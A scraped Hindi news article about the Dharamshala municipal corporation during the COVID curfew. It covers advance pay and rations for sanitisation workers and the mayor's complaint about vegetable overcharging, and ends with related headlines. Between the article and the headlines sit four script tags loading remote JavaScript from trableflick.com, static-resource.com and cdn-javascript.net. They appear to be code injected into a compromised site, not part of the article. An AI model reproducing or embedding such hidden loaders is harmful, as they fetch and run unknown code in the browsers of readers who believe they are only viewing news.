<p>नगर निगम धर्मशाला ने कोरोना के चलते शहर को सेनेटाइज करने वाली लेबर को राहत प्रदान करते हुए एडवांस सेलेरी दी है। वहीं सिविल कांटे्रक्टर्स को लेबर का इंतजाम करने के निर्देश जारी किए हैं। वहीं, धर्मशाला के विभिन्न क्षेत्रों में सब्जियों के वसूले जा रहे अधिक दामों संबंधी मिल रही शिकायतों पर निगम प्रशासन ने जिला प्रशासन से ऐसे मामलों पर संज्ञान लेते हुए कड़ी कार्रवाई का आग्रह किया है।</p>
<p> नगर निगम धर्मशाला के मेयर देवेंद्र जग्गी ने कहा कि सेनेटाइजेशन का काम करने वाली लेबर को अग्रिम वेतन भुगतान किया गया है। लेबर के राशन के इंतजाम के लिए ठेकेदार को बोला गया है। निगम द्वारा लेबर को भी एक माह का राशन दिया जा रहा है। सिविल कांटे्रक्टर को लेबर का इंतजाम खुद करने की बात कही है। हमारा प्रयास है कि शहर में रहने वाले हर प्रवासी को राशन मिले, जिससे कर्फ्यू के दौरान उन्हें किसी तरह की परेशानी न हो। नगर निगम धर्मशाला के मेयर देवेंद्र जग्गी ने कहा कि सब्जियों के ज्यादा दाम वसूलने के संबंध में निगम के कमीशनर से बात हुई है। डीसी कांगड़ा से भी बात की जाएगी कि जो लोग ज्यादा दाम वसूल रहे हैं, उन पर नकेल कसी जाए, क्योंकि यह समय लोगों को ठगने का नहीं है, बल्कि सहयोग करने का है। दुकानदारों से अपील है कि सभी लोगों से वस्तुओं के उचित दाम ही वसूलें।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1586084217348″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Kullu Dussehra 2024: अंतरराष्ट्रीय कुल्लू दशहरा उत्सव का शुभारंभ 13 अक्तूबर को राज्यपाल शिव…
No effigy burning Hamirpur : हमीरपुर शहर में पिछले 3 वर्षों से दशहरे का आयोजन…
Hamirpur: अखिल भारतीय विद्यार्थी परिषद का 45वां प्रदेश अधिवेशन 7 से 9 नवंबर 2024 को…
Ratan Tata successor Noel Tata: नोएल टाटा, जो दिवंगत रतन टाटा के सौतेले भाई…
Patwari arrested for bribe : हिमाचल प्रदेश के कांग`ड़ा जिले में स्टेट विजिलेंस एंड…
RS Bali at Bajreshwari Temple : 11 अक्टूबर 2024 को हिमाचल प्रदेश पर्यटन विकास निगम…